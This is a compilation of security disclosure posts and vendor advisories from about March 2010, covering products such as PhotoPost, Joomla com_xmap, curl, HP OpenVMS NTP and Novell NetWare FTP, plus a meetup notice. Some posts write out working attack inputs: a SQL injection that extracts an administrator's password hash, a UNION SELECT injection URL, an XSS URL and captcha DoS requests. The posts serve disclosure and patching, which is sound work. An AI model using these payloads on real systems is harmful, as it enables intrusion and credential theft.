Vulnerabilities in ArcManager
Hello Bugtraq! I want to warn you about security vulnerabilities in ArcManager. - Advisory: Vulnerabilities in ArcManager - URL: http://websecurity.com.ua/4057/ - Timeline: 17.03.2010 - found vulnerabilities. 22.03.2010 - disclosed at my site. 23.03.2010 - informed developers. - Details: These are Insufficient Anti-automation and Denial of Service vulnerabilities. The vulnerabilities exist in captcha script CaptchaSecurityImages.php, which is using in this system. I already reported about vulnerabilities in CaptchaSecurityImages (http://websecurity.com.ua/4043/). Insufficient Anti-automation: http://site/libs/captcha/CaptchaSecurityImages.php?width=150height=100characters=2 Captcha bypass is possible as via half-automated or automated (with using of OCR) methods, which were mentioned before (http://websecurity.com.ua/4043/), as with using of session reusing with constant captcha bypass method (http://websecurity.com.ua/1551/), which was described in project Month of Bugs in Captchas. DoS: http://site/libs/captcha/CaptchaSecurityImages.php?width=1000height=9000 With setting of large values of width and height it's possible to create large load at the server. Vulnerable are all versions of ArcManager. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
[security bulletin] HPSBOV02497 SSRT090245 rev.2 - HP TCP/IP Services for OpenVMS Running NTP, Remote Execution of Arbitrary Code, Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01961959 Version: 2 HPSBOV02497 SSRT090245 rev.2 - HP TCP/IP Services for OpenVMS Running NTP, Remote Execution of Arbitrary Code, Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2010-03-23 Last Updated: 2010-03-26 Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP TCP/IP Services for OpenVMS Running NTP. The vulnerabilities could be remotely exploited to execute arbitrary code or create a Denial of Service (DoS). References: SSRT090073, CVE-2009-0159, CVE-2009-1252, CVE-2009-3563 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP TCP/IP Services for OpenVMS v5.5 and v5.6 on Itanium and Alpha platforms. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2009-0159(AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2009-1252(AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2009-3563(AV:N/AC:L/Au:N/C:N/I:P/A:P) 6.4 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made the following patch kits available to resolve the vulnerability. Patch kit installation instructions are provided in the file readme.txt . The patch kits and installation instructions are available from the following location using ftp: HostAccount Password ftp.usa.hp.com vmstcpip vmsTcp1p NTP for HP OpenVMS TCPIP patch kits are available for both ALPHA and ITANIUM platforms. HP OpenVMS TCPIP VersionPlatformPatch kit LocationPatch kit Image v 5.5 ECO 3 ALPHA NTP_V55/ECO3/ qxcr1000910870_v55_eco3_alpha.bck v 5.5 ECO 3 Itanium NTP_V55/ECO3/ qxcr1000910870_v55_eco3_i64.bck v 5.6 ECO 4 ALPHA NTP_V56/ECO4/ qxcr1000910870_v56_eco4_alpha.bck v 5.6 ECO 4 Itanium NTP_V56/DCO4/ qxcr1000910870_v56_eco4_i64.bck v 5.6 ECO 5 ALPHA NTP_V56/ECO5/ QXCR1000910870_V56_ECO5_ALPHA.BCK v 5.6 ECO 5 Itanium NTP_V56/ECO5/ QXCR1000910870_V56_ECO5_I64.BCK PRODUCT SPECIFIC INFORMATION None HISTORY Version:1 (rev.1) 23 March 2010 Initial release Version:2 (rev.2) 26 March 2010 Updated CVE reference and patck kit information Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-al...@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. HP is broadly distributing this Security Bulletin in order to
[SECURITY] [DSA 2023-1] New curl packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2023-1 secur...@debian.org http://www.debian.org/security/ Steffen Joeris March 28, 2010http://www.debian.org/security/faq - Package: curl Vulnerability : buffer overflow Problem type : local (remote) Debian-specific: no CVE Id : CVE-2010-0734 Wesley Miaw discovered that libcurl, a multi-protocol file transfer library, is prone to a buffer overflow via the callback function when an application relies on libcurl to automatically uncompress data. Note that this only affects applications that trust libcurl's maximum limit for a fixed buffer size and do not perform any sanity checks themselves. For the stable distribution (lenny), this problem has been fixed in version 7.18.2-8lenny4. Due to a problem with the archive software, we are unable to release all architectures simultaneously. Binaries for the hppa, ia64, mips, mipsel and s390 architectures will be provided once they are available. For the testing distribution (squeeze) and the unstable distribution (sid), this problem has been fixed in version 7.20.0-1. We recommend that you upgrade your curl packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny4.dsc Size/MD5 checksum: 1419 0b91fb707442ec5f1dff454ddd0d2679 http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2.orig.tar.gz Size/MD5 checksum: 2273077 4fe99398a64a34613c9db7bd61bf6e3c http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny4.diff.gz Size/MD5 checksum:29053 205ea45b37707ca44847a0bb953a108e alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny4_alpha.deb Size/MD5 checksum: 224560 39c97dc3fc8adfe369d050d4ccd57112 http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny4_alpha.deb Size/MD5 checksum: 211362 d04f5a02fbce3a0ed6b757e36aa21f37 http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny4_alpha.deb Size/MD5 checksum: 986188 ca28494e3f9ee836f9893608e5f82c1b http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny4_alpha.deb Size/MD5 checksum: 1150648 b33b695186a2f70f00fdf1dacfb25b62 http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny4_alpha.deb Size/MD5 checksum: 958014 ba4136dd3c9e204c03d7793d06f1205e http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny4_alpha.deb Size/MD5 checksum: 241806 b0bca91ebffa1b09ddf9ea07004423d4 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny4_amd64.deb Size/MD5 checksum: 933302 b14bed60c0ff0d9f5647c7624bce4290 http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny4_amd64.deb Size/MD5 checksum: 209380 803de8e14287846ceae6f12a011d48bf http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny4_amd64.deb Size/MD5 checksum: 215342 4ee8ef24407aa837b37ada3b7c261047 http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny4_amd64.deb Size/MD5 checksum: 1182708 9e4b1721388b113033cbff04c764bfa1 http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny4_amd64.deb Size/MD5 checksum: 231906 6f9ce83dd70ce4ec606adcaa78e11904 http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny4_amd64.deb Size/MD5 checksum: 954234 8955fd4b4539044f08b074aae12d01e3 arm architecture (ARM) http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny4_arm.deb Size/MD5 checksum: 222366 6a5c14d84303e3acfa699ba7fb14ed1a http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny4_arm.deb Size/MD5 checksum: 208124 219373aea91cfde58dfa15c7237462bf
{PRL} Novell Netware FTP Remote Stack Overflow
# Application: Novell Netware FTP Remote Stack Overflow Platforms: Novell Netware 6.5 SP8 Exploitation: Remote Code Execution CVE Number: CVE-2010-0625 Novell TID: 3238588 Discover Date: 2009-07-23 Author: Francis Provencher (Protek Research Lab's) Blog: http://www.protekresearchlab.com/ # 1) Introduction 2) Report Timeline 3) Technical details 4) The Code # === 1) Introduction === Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The company specializes in enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare; identity, security, and systems management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse. Novell was instrumental in making the Utah Valley a focus for technology and software development. Novell technology contributed to the emergence of local area networks, which displaced the dominant mainframe computing model and changed computing worldwide. Today, a primary focus of the company is on developing open source software for enterprise clients. (http://en.wikipedia.org/wiki/Novell) # 2) Report Timeline 2010-01-25 Vendor Contact 2010-01-26 Vendor repsonse 2010-03-26 Coordinate release of this advisory # 3) Technical details It's possible to overflow the stack and rewrite the EIP by sending a mkdir and a rmdir request with these special caracters ~A/ 320 time. The nlm version; NWFTPD.nlm Netware FTP Server Version 5.09.03 October 14 2008 The register; Abend 1 on P00: Server-5.70.08: Page Fault Processor Exception (Error code ) Registers: CS = 0008 DS = 0023 ES = 0023 FS = 0023 GS = 0023 SS = 0010 EAX = 0238 EBX = 7E2F417E ECX = 55AA08D4 EDX = 0001 ESI = 2F417E2F EDI = 429980C0 EBP = 417E2F41 ESP = A94A9FA4 EIP = 007E2F41 FLAGS = 00010282 Address (0x007E2F41) exceeds valid memory limit EIP in UNKNOWN memory area Access Location: 0x007E2F41 # === 4) The Code === This issue can be trigger manually # (PRL-2010-03)
London DEFCON March meet - DC4420 - Wednesday March 31st 2010
Yes, we've just managed to squeak in the last Wednesday of the month and, as autom8on failed to burn down the venue last month, we're back to have another go... This month's lineup is: The tekky one: DIY grid computing - it's easier than you think tqm will show how to create a simple grid and spread the load across many nodes using some brain cells, commodity hardware and some not-so-magic scripting The fun one: Rocketry for fun and profit the hatter will show us some fun (if rather efficient) ways to turn spare money into smoke, and some tips on getting more *BANG* for your buck... Other stuff you need to know... Venue: Upstairs at The Black Horse, 6 Rathbone Place, W1T 1HH http://tinyurl.com/dc4420-venue Nearest stations: Tottenham Court Road London Underground station (150m) - zone 1 Goodge Street London Underground station (440m) - zone 1 Oxford Circus London Underground station (630m) - zone 1 Leicester Square London Underground station (680m) - zone 1 Covent Garden London Underground station (750m) - zone 1 Kickoff: Wednesday March 31st 2010 Room owned from 18:00, assimilation starts at 20:00 Beer: Yes, both kinds Last orders 23:00 Food: Yes, tasty Kitchen closes at 21:30 Music: Nah Strippers: We live in hope... Rules: Fight Club More: http://dc4420.org cheers, MM -- In DEFCON, we have no names... errr... well, we do... but silly ones...
Medium security hole in Varnish reverse proxy
Hi, I've identified a couple of security flaws affecting the Varnish reverse proxy which may allow privilege escalation. These issues were reported by email to the vendor but he feels that it is a configurational issue rather than a design flaw. Whilst I can partially see his point in that the administrative interface can be disabled, I'm not convinced that making a C compiler available over a network interface without authentication is sound practice, especially when the resultant compiled code can be made to run as root rather trivially. Tim -- Tim Brown mailto:t...@nth-dimension.org.uk http://www.nth-dimension.org.uk/ NDSA20090908.txt.asc Description: PGP signature signature.asc Description: This is a digitally signed message part.
Exploiting nano
I just finished a blog post detailing how the popular text editor, nano, is unsafe to run as root to edit untrusted users' files, with consequences including full privilege escalation: http://drosenbe.blogspot.com/2010/03/nano-as-root.html This is not a disclosure of vulnerabilities per se; rather, it's just a look at how some security assumptions may not hold when running programs as root in a hostile environment, using nano as an example. Nothing earth-shattering, just thought some of you might be interested. Comments welcome. -Dan
SQL Injection Vulnerabilitie in PhotoPost vBGallery 2.5
Product Imnformation PhotoPost vBGallery is a popular commercial Image Gallery Add-on für vBulletin which is being developed by All Enthusiasts, Inc. http://www.photopost.com Description --- PhotoPost vBGallery 2.5 allows the user to modify gallery settings for his profile page if the function is enabeld and the user has permission to do so. For this function to work, PhotoPost vBGallery adds a Plug-in to hook profile_start. The PHP code on this plug-in is being used to display a form which does allow the user to customize the settings and save the settings into the database. The SQL constructed for action updatevbgallery does contain variables that are not properly sanitized: The POST variables profile_include and profile_exclude are treated as HTML-Safe strings ad unses with the SQL directly althou only commaseparated integers are valid. POST variable profile_showimg is also processed as a HTML-safe string altouth only integer values are valid. POST variable profile_column is also processed as a HTML-safe string but not being made SQL-safe. POST variable array profile_imagebitdisplay is being stored without being made SQL-safe Versions - Affected Version(s): 2.5 Not affected Versions: Versions prior to 2.5 Exploit --- This exploit shows how the get the password hash and salt of an administrator account. Preconditions - No table prefix is being used - The gallery functions are enabled for member profiles - User-ID of an adminitrator account is 1 - The vBulletin database error page is unmodified and shows the executed SQL as an HTML comment - The account being used has permissions to modify gallery profil settings 1) Go to forumroot/profile.php?do=vbgalleryprofile 2) Using Firebug, remove the maxlength attribute for the input labeled Exclude Catagories 3) Enter ', profile_exclude = (SELECT CONCAT(password, '|||', salt) FROM user WHERE userid = 1), profile_include = ' into the imnput field Exclude Catagories 4) Submit the form 5) Access your own profile page (forumroot/member.php?u=X) 5) The HTML source of the database error page will contain an HTML comment like --- Invalid SQL: SELECT imageid, images.title, images.description, filename, thumbname, originalname, extension, images.catid ,images.userid, images.username, images.description, images.dateline, images.views, posts ,width, height, originalwidth, originalheight ,filesize, originalfilesize, images.lastpostdateline, images.lastpostuserid, images.lastpostusername, votenum, votetotal, categories.title AS cattitle FROM ppgal_images AS images LEFT JOIN ppgal_categories AS categories USING (catid) WHERE valid = 1 AND images.userid = 5 AND images.catid NOT IN (abcdef12344777148822d7530f089fbd|||.%/) AND images.thumbname != '' --- The string after AND images.catid NOT IN ( is the password hash and salt of user ID 1 separated by ||| Suggested Fixes --- Properly sanitize user input and run strings trough $db-escape_string() before saving them into the database Patches --- All Enthusiasts, Inc. was informed about this vulnerbilitie on 2010/03/17 but has not yet released a patch.
Remote buffer overflow in aircrack-ng causes DOS and possible code execution
We can cause aircrack-ng and airdecap-ng to crash when reading specially crafted dump-files and can also crash remote airodump-ng sessions by sending specially crafted packets over the air. I am 90% sure that this denial-of-service can be escalated to remote-code-execution by carefully introducing new stations to airodump-ng (for memory allocation) and then causing a heap corruption as demonstrated. The tools’ code responsible for parsing IEEE802.11-packets assumes the self-proclaimed length of a EAPOL-packet to be correct and never to exceed a (arbitrary) maximum size of 256 bytes for packets that are part of the EAPOL-authentication. We can exploit this by letting the code parse packets which: a) proclaim to be larger than they really are, possibly causing the code to read from invalid memory locations while copying the packet; b) really do exceed the maximum size allowed and overflow data structures allocated on the heap, overwriting libc’s allocation-related structures. This causes heap-corruption. Steps to Reproduce: 1. Get example file from http://pyrit.googlecode.com/svn/tags/opt/aircrackng_exploit.cap; or generate it via http://pyrit.googlecode.com/svn/tags/opt/aircrackng_exploit.py; 2. Run it through aircrack-ng, airdecap-ng or airodump-ng (airodump-ng -r aircrackng_exploit.cap)
Vulnerabilities in MiniManager for Project MANGOS
Hello Bugtraq! I want to warn you about security vulnerabilities in MiniManager for Project MANGOS. - Advisory: Vulnerabilities in MiniManager for Project MANGOS - URL: http://websecurity.com.ua/4061/ - Timeline: 17.03.2010 - found vulnerabilities. 23.03.2010 - disclosed at my site. 24.03.2010 - informed developers. - Details: These are Insufficient Anti-automation and Denial of Service vulnerabilities. The vulnerabilities exist in captcha script CaptchaSecurityImages.php, which is using in this system. I already reported about vulnerabilities in CaptchaSecurityImages (http://websecurity.com.ua/4043/). Insufficient Anti-automation: http://site/libs/captcha/CaptchaSecurityImages.php?width=150height=100characters=2 Captcha bypass is possible as via half-automated or automated (with using of OCR) methods, which were mentioned before (http://websecurity.com.ua/4043/), as with using of session reusing with constant captcha bypass method (http://websecurity.com.ua/1551/), which was described in project Month of Bugs in Captchas. DoS: http://site/libs/captcha/CaptchaSecurityImages.php?width=1000height=9000 With setting of large values of width and height it's possible to create large load at the server. Vulnerable MiniManager for Project MANGOS 0.15 and previous versions. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
XSS vulnerability in easy page cms
# # Securitylab.ir # # Application Info: # Name: Easy Page # Vendor: http://easypage.org # # Vulnerability Info: # Type: XSS # Risk: low # Vulnerability: http://site.ir/default.aspx?page=Documentapp=DocumentsdocId=1docParId=script(xss)/script # # Discoverd By: Pouya Daneshmand # Website: http://Pouya.Securitylab.ir # Contacts: info[at]securitylab.ir whh_iran[at]yahoo.com ###
Re: [Full-disclosure] Medium security hole in Varnish reverse proxy
Post some code that people can evaluate. For starters, There's no reason why varnish ever has to run as root. It never listens on privileged ports, and the C compiler is never available over a network interface. You can ask varnish to reload a configuration and recompile it, but you'd have to have write access to the filesystem first. You an also only cause recompilation to occur if the admin interface is up and running, which can be easily disabled. Poul is probably correct. Any vulnerabilities in Varnish with regards to privilege escalation are configuration issues. -j On Mon, Mar 29, 2010 at 12:49 AM, Tim Brown t...@nth-dimension.org.uk wrote: Hi, I've identified a couple of security flaws affecting the Varnish reverse proxy which may allow privilege escalation. These issues were reported by email to the vendor but he feels that it is a configurational issue rather than a design flaw. Whilst I can partially see his point in that the administrative interface can be disabled, I'm not convinced that making a C compiler available over a network interface without authentication is sound practice, especially when the resultant compiled code can be made to run as root rather trivially. Tim -- Tim Brown mailto:t...@nth-dimension.org.uk http://www.nth-dimension.org.uk/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Joomla Component com_xmap Sql Injection Vulnerability
# # Securitylab.ir # # Application Info: # Name: Joomla Component com_xmap # # Vulnerability Info: # Type: Sql Injection # Risk: Medium # Vulnerability: http://site.com/index.php?option=com_xmapsitemap=2Itemid=18-1 UNION SELECT 1,2,3,version(),5,6,7,8-- # # Discoverd By: Pouya Daneshmand # Website: http://Pouya.securitylab.ir # Contacts: admin[at]securitylab.ir whh_iran[AT]yahoo.com ###